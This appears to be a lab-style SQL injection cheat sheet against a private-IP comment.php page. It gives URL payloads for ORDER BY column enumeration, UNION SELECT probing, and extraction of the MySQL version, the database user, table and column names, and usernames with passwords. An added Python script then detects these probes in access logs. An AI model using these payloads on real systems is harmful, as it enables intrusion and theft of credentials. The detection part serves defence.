SQL

Enumerate the number of columns

e.g.

http://10.11.15.64/comment.php?id=735 order by 7

http://10.11.15.64/comment.php?id=735%20order%20by%207

  • from this we can determine that there are 6 columns: ORDER BY 7 produces an error while ORDER BY 6 does not, so the original query returns 6 columns

Understanding the layout of the output

e.g.

http://10.11.15.64/comment.php?id=735 union select all 1,2,3,4,5,6

http://10.11.15.64/comment.php?id=735%20union%20select%20all%201,2,3,4,5,6

  • A UNION requires the injected SELECT to return exactly the same number of columns as the original query (no more and no less)

  • e.g. this would fail, because it supplies only 5 columns against a 6-column query

http://10.11.15.64/comment.php?id=735 union select all 1,2,3,4,5

Extracting data from the database

Discover the version of MySQL in use:

http://10.11.15.64/comment.php?id=735 union all select 1,2,3,4,@@version,6

Discover the current user being used for the database connection:

http://10.11.15.64/comment.php?id=735 union all select 1,2,3,4,user(),6

Tables:

http://10.11.15.64/comment.php?id=735 union all select 1,2,3,4,table_name,6 FROM information_schema.tables

Columns:

http://10.11.15.64/comment.php?id=735 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users'

Usernames and passwords (0x3a is a hex-encoded colon, used as the separator between the two fields):

http://10.11.15.64/comment.php?id=735 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users
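From the defender's side, the sequence above leaves a recognisable trail in the web server access log: an ORDER BY probe, then a UNION SELECT with a fixed number of columns, then UNION queries pulling real data. The following is an added example, not part of the original page, that parses constructed Apache-style log lines, percent-decodes each query-string value and reports the probe type and the column count being tried; the log lines, the scan_log/classify_value names and the 500 status for the failed ORDER BY are assumptions made for the demonstration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access-log lines (not from the original page) replaying
# the enumeration sequence described above: a benign request, an ORDER BY probe,
# a UNION column probe and a UNION data extraction.
SAMPLE_LOG = """\
10.11.15.5 - - [01/Jan/2024:10:00:01 +0000] "GET /comment.php?id=735 HTTP/1.1" 200 512
10.11.15.5 - - [01/Jan/2024:10:00:02 +0000] "GET /comment.php?id=735%20order%20by%207 HTTP/1.1" 500 0
10.11.15.5 - - [01/Jan/2024:10:00:03 +0000] "GET /comment.php?id=735%20union%20select%20all%201,2,3,4,5,6 HTTP/1.1" 200 640
10.11.15.5 - - [01/Jan/2024:10:00:04 +0000] "GET /comment.php?id=735%20union%20all%20select%201,2,3,4,concat(name,0x3a,password),6%20FROM%20users HTTP/1.1" 200 700
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')
ORDER_BY_RE = re.compile(r"\border\s+by\s+(\d+)", re.I)
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\s+(?:all\s+)?(.*?)(?:\s+from\b|$)", re.I)

def count_select_columns(select_list):
    """Count comma-separated expressions, ignoring commas nested inside parentheses."""
    depth, count = 0, 1
    for ch in select_list:
        depth += (ch == "(") - (ch == ")")
        if ch == "," and depth == 0:
            count += 1
    return count

def classify_value(value):
    """Return ('order_by_probe', n) or ('union_probe', n_columns) for one decoded value, else None."""
    m = ORDER_BY_RE.search(value)
    if m:
        return ("order_by_probe", int(m.group(1)))
    m = UNION_RE.search(value)
    if m:
        return ("union_probe", count_select_columns(m.group(1)))
    return None

def scan_log(text):
    """Return one finding per request whose query-string values carry a probe pattern."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes each value once, so "%20order%20by%207" becomes " order by 7".
        for name, values in parse_qs(urlsplit(m.group("target")).query).items():
            for hit in filter(None, map(classify_value, values)):
                findings.append({"ip": m.group("ip"), "status": int(m.group("status")),
                                 "param": name, "kind": hit[0], "n": hit[1]})
    return findings
```

A run of order_by_probe findings from one IP followed by union_probe findings with a constant column count is the column-enumeration phase; the HTTP 500 on the ORDER BY 7 request is the error response the attacker used to settle on 6 columns.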
